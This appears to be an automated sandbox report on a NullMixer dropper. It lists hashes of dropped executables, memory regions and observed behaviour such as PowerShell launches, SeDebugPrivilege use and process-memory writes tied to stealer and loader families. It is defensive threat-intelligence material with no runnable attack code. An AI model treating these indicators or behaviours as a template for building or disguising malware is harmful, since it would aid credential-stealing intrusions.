SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe

MD5 7b253e0725b69672ef3d44d524de2c4c
SHA1 f3c0d9f5f984ee5d7578eeabded495094cec1031
SHA256 8b6540b22cc0be302f5c1e71de5d436a4036af18a55a0e4f185d0aaec6756d5c
SHA512 24c5808384fdb0ab8fe0b8b9e6a7fef6db39071c655f7dc6399aedf24d1e005a67e5285f752be29966de9078e47cf97427c67473fb88e0e78280b3d578a5e774

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

memory/2692-104-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2692-103-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe

MD5 cd6d011a663a12f81ba8e4e5407e3a6f
SHA1 53c81876f0ff422d41f19c6d2ea0d30548e4e071
SHA256 c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1
SHA512 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe

MD5 8268aa1cba3763a79c3dd333ab42c093
SHA1 e7d034e6f55bc07b38ad50f5bb2e83f098c60c97
SHA256 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f
SHA512 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

memory/1440-137-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2692-105-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

MD5 343befc915e3428791029f5f314393b9
SHA1 47701bb5f2f8b6c5135abccec790378c3986f555
SHA256 4ca6bf1db2cb7f2f8799180ee8a56c2d96f718484a4ee3e06e32aebe6897c1da
SHA512 9381340ccad3ac5ce239908b3f90cd32ee1b835510d8ecc17b72049a49bb6613ed246d955d0a65f4970735f8cabcfd9af93417034a405d00ef193975cd1b2e5e

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe

MD5 3476b903e6e6ff5f246460e8749fd232
SHA1 3639e6c1f104ad7aa24ab7f72aca5dad686361cf
SHA256 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002
SHA512 ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026

\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

memory/2136-141-0x0000000001200000-0x0000000001226000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G7PIUG5SR263X945YGX.temp

MD5 237e86d133f57b8f0e5c235b90165404
SHA1 097e472cb0ade2c1a953b898a89640b76f26d939
SHA256 d9ed6170cd22685a9cf2f8c896ea92943eb60f3884b9d5fbee1cbd83301e8666
SHA512 0da7db83f8102dc6ce24acc32d99bbe06a1e8e36b19ab0b0c144a38315c5537d6cbce87af8f92f51d5b6fa32ebfb3fb8369a704d31fb0deaf5f5e8a8bf4d3a81

memory/1048-148-0x00000000028D0000-0x0000000002FC5000-memory.dmp

memory/1416-149-0x0000000000400000-0x0000000000AF5000-memory.dmp

memory/1772-150-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/3028-140-0x0000000000800000-0x0000000000808000-memory.dmp

memory/1416-152-0x0000000001260000-0x0000000001955000-memory.dmp

memory/1416-153-0x0000000001260000-0x0000000001955000-memory.dmp

memory/1996-156-0x0000000000380000-0x00000000003E8000-memory.dmp

memory/1384-157-0x00000000002D0000-0x0000000000338000-memory.dmp

memory/2136-168-0x0000000000440000-0x0000000000446000-memory.dmp

memory/2028-169-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1680-171-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1672-172-0x0000000004F20000-0x000000000532F000-memory.dmp

memory/1440-177-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2692-102-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2692-100-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2692-96-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BLA5Q.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1416-189-0x0000000000400000-0x0000000000AF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BLA5Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe

MD5 1fd5c6ee4e5c6af11015087d8d6af3b0
SHA1 21aef092eb546d508740185e38b52896fb6aea5d
SHA256 d41f88572be0063290efe714d45528ba9d467ac89e066d88f13e13a7325bc663
SHA512 5074aafa3d7030713940aa9436b1c96fdef2e7df52c68f5d97203fe0ec3af7055934e6b6cac5ba95c69310e037863b16759b1f475c4e42ab61e9acb7ed387975

memory/2136-191-0x0000000000460000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe

MD5 3bb8763cc667a751d1653cc3634f1f83
SHA1 d2e0dc47a6085864ec65ec0fa326b4434bd7f376
SHA256 f369798e25e4c2dd109caf27fb399d2f32200e07a5550fdb48816daaa5563843
SHA512 1c5800e5b80775f33ad55a13418c039b3c56b8e532ccf8d5895c5a4e904731f76104ff6469075d093f39c902364bb8c19d048a3a4aa6b2893e03ebc4e41f160e

memory/2136-192-0x0000000000470000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe

MD5 5cd1e88d510f00080fecc9d52fb97ba3
SHA1 c2d8521c2ec33026df1f07a0214b422ce12f702d
SHA256 f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470
SHA512 d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195

memory/1416-197-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/1416-220-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/1416-222-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/1416-217-0x0000000003000000-0x0000000003001000-memory.dmp

memory/1416-223-0x0000000000400000-0x0000000000AF5000-memory.dmp

memory/1416-215-0x0000000003000000-0x0000000003001000-memory.dmp

memory/1416-212-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/1416-210-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/1416-207-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/1416-205-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/1416-202-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

memory/1416-200-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

memory/1416-198-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

memory/1416-195-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/1416-193-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/448-226-0x0000000000400000-0x0000000002B41000-memory.dmp

memory/608-241-0x0000000002930000-0x0000000002DEE000-memory.dmp

memory/608-243-0x0000000002EF0000-0x0000000002F9E000-memory.dmp

memory/2924-256-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2884-269-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2924-246-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2924-244-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1048-278-0x00000000028D0000-0x0000000002FC5000-memory.dmp

memory/1416-279-0x0000000000400000-0x0000000000AF5000-memory.dmp

memory/1416-280-0x0000000001260000-0x0000000001955000-memory.dmp

memory/3044-310-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/2172-352-0x0000000000570000-0x0000000000578000-memory.dmp

memory/2172-350-0x0000000000BD0000-0x0000000000BF2000-memory.dmp

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\56ZKHKVYOPUXMOMP5SR3.temp

MD5 677b8bc16975a2d8f4d553257c6f89e1
SHA1 e7f5c2a612f74f743ce3e0bc6be1921766d8e8b5
SHA256 f22d2ca8ab0c494a77a9e691a0541daf51c7d3e4de134fc27ef095983412575c
SHA512 67b07b3b1d019a4ef96afe4ebfbda635a73d05a78d506b27f98b89287793105c25a87e8e27d81128a49d66f5f97ce5b6ef91d5e1897cb0998cc31c9ab302e2d0

memory/1912-395-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/1912-407-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab38BC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar38DF.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 21:27

Reported

2024-11-09 21:30

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4408 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
PID 4408 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
PID 4408 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe
PID 4620 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4620 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
